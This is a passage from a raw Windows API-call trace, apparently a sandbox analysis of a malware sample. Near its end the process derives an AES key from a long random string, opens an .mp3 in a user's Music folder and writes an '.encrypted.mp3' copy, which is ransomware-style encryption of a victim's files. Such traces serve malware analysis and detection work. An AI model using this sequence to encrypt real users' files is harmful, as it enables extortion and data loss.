(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.334] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.334] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0037.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0037.335] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.335] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.336] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9c8 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9c8 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0037.336] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.336] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.336] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0037.336] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0037.336] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9c8 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c95d0 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x101) returned 0x7c96d8 [0037.337] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6xyQavn5nxUqy4DgEkV7fYgQVUScS2e77NC2Y5hyLzfJ4YGHgnKnnTkEJN69uQvUeZGT9w2733pqjsq6hNN7dfPYVFsCLBsnTLTP9uCBc2dK28DXHbgzuhwxLF7CLZL3RQzHEdGKHZUTAqYmgS92xNQhrmhE7zrgkdQ2QR3cXTdw2mdz6LXcnYKJMRszQQXnLCmHQ93sQyaxqpEneShPJE7CkyuMLCEY8HEPMC9dG8Zw8wdRyydgPdWnr26AADRP", cchWideChar=257, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 257 [0037.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x101) returned 0x7c97e8 [0037.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6xyQavn5nxUqy4DgEkV7fYgQVUScS2e77NC2Y5hyLzfJ4YGHgnKnnTkEJN69uQvUeZGT9w2733pqjsq6hNN7dfPYVFsCLBsnTLTP9uCBc2dK28DXHbgzuhwxLF7CLZL3RQzHEdGKHZUTAqYmgS92xNQhrmhE7zrgkdQ2QR3cXTdw2mdz6LXcnYKJMRszQQXnLCmHQ93sQyaxqpEneShPJE7CkyuMLCEY8HEPMC9dG8Zw8wdRyydgPdWnr26AADRP", cchWideChar=257, lpMultiByteStr=0x7c97e8, cbMultiByte=257, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6xyQavn5nxUqy4DgEkV7fYgQVUScS2e77NC2Y5hyLzfJ4YGHgnKnnTkEJN69uQvUeZGT9w2733pqjsq6hNN7dfPYVFsCLBsnTLTP9uCBc2dK28DXHbgzuhwxLF7CLZL3RQzHEdGKHZUTAqYmgS92xNQhrmhE7zrgkdQ2QR3cXTdw2mdz6LXcnYKJMRszQQXnLCmHQ93sQyaxqpEneShPJE7CkyuMLCEY8HEPMC9dG8Zw8wdRyydgPdWnr26AADRP", lpUsedDefaultChar=0x0) returned 257 [0037.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c97e8 | out: hHeap=0x770000) returned 1 [0037.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c96d8 | out: hHeap=0x770000) returned 1 [0037.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0037.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.344] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.344] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0037.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.344] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.344] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.344] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.345] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.345] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.345] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0037.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0037.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.345] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.345] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.345] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.345] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.345] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.345] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0037.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.345] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0037.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.345] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.346] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.346] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0037.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.346] CryptDestroyHash (hHash=0x7c2240) returned 1 [0037.346] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0037.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.346] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4rukxk6sjcr.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.346] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.346] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0037.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.346] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.346] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4RuKxK6SJcR.encrypted.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4rukxk6sjcr.encrypted.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.347] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.347] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.347] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0037.347] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.347] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.347] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0037.347] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0037.349] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x187d, lpOverlapped=0x0) returned 1 [0037.349] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0037.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0037.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.352] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.353] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.353] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.353] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0037.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.355] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0037.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0037.355] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.355] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.355] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, 